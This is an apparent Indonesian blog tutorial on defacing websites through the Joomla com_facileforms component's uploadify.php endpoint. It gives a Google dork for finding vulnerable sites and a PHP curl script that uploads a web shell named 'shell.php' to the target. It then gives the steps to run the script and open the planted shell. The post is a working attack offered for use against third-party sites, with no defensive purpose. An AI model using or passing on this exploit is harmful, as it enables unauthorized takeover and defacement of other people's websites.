Header Ads

Deface Menggunakan COM_Facileforms

Dorknya : 
inurl:com_facileforms
(Kembangin lagi kak, gunakan imajinasi colizer kalian biar dpt yg vuln and verawan)

- Masukan Dork diatas ke kotak pencarian google (seterah :v mau pakek bing juga blh)

exploit: 
/[path]/components/com_facileforms/libraries/jquery/uploadify.php

- pilih target , lalu masukan diblakang url target web sobat
contoh:
http://target.co.li/[path]/components/com_facileforms/libraries/jquery/uploadify.php


- jika vuln: Blank
(kalo gak salah sih gitu wkwkw ) 


- jika vuln copy sourcecode dibawah, dan save dgn ekstensi php.
- lalu taruh di folder /xampp/php , bersama dengan shell sobat


<?php

$uploadfile="shell.php";
$ch = curl_init("http://target.site/[path]/components/com_facileforms/libraries/jquery/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/components/com_facileforms/libraries/jquery/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
  
print "$postResult";
?>


- lalu buka CMD dan ketikan:

cd C:/xampp/php
php namasourcecodelo.php



(jika berhasil, akan muncul angka 1, nampak kek digambar)

- kalau sudah begitu tinggal panggil Shell kesayangan sobat 

- akses shell: 
http://target.site/[path]/components/com_facileforms/libraries/jquery/shell.php



No comments

Silahkan Komentar dengan bahasa yang sopan

Powered by Blogger.